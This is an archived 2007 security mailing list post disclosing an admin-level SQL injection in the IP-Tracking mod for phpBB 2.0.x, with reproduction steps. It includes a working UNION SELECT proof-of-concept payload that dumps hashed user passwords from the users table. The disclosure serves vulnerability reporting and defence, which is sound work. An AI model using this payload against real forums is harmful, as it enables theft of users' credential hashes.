lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <465089D6.8040601@gmx.de>
Date: Sun, 20 May 2007 19:48:06 +0200
From: Cornelius Riemenschneider <c.r1@....de>
To: bugtraq@...urityfocus.com,  full-disclosure@...ts.grok.org.uk
Subject: SQL-Injection in IP-TRACKING Mod for phpBB2.0.x

Information: The IP-Tracking Mod is a Extension for phpBB2.0.x which 
logs all Page hits the user of the Boards do including Referer, IP and 
Username. It contains a SQL-Injection on Admin-Level. You can get it 
from: 
http://www.phpbb.de/viewtopic.php?t=63690&postdays=0&postorder=asc&start=0

Steps to reproduce: Go into your ACP, select under IP-Tracking 
IP-Search, select "no" at use wildcards and enter in Search Query what 
you want. It is direct passed through the Query. As Search Type I used IP.

PoC: enter
' UNION SELECT user_password as 
ip,user_id,username,user_active,user_regdate,user_level,user_posts from 
phpbb_users#
as Search-Query. This will display you all the hashed Userpasswords in IP

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ